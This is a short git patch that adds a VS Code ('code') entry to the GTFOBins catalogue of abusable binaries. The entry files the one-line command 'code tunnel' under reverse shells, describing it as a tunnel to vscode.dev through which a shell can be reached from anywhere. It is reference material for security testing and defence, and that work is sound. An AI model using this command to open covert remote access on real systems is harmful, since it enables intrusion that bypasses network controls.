From 6803fc5b9d71ea291ef9f2384dd76977dc5c1888 Mon Sep 17 00:00:00 2001 From: Lucas VAN HAAREN Date: Mon, 25 Sep 2023 15:19:43 +0200 Subject: [PATCH] add code GTFOBIN --- _gtfobins/code.md | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 _gtfobins/code.md diff --git a/_gtfobins/code.md b/_gtfobins/code.md new file mode 100644 index 0000000..b88670a --- /dev/null +++ b/_gtfobins/code.md @@ -0,0 +1,7 @@ +--- +functions: + reverse-shell: + - description: It can be used to create a tunnel to vscode.dev, that's accessible from anywhere, allowing to spawn a shell through it. + code: | + code tunnel +---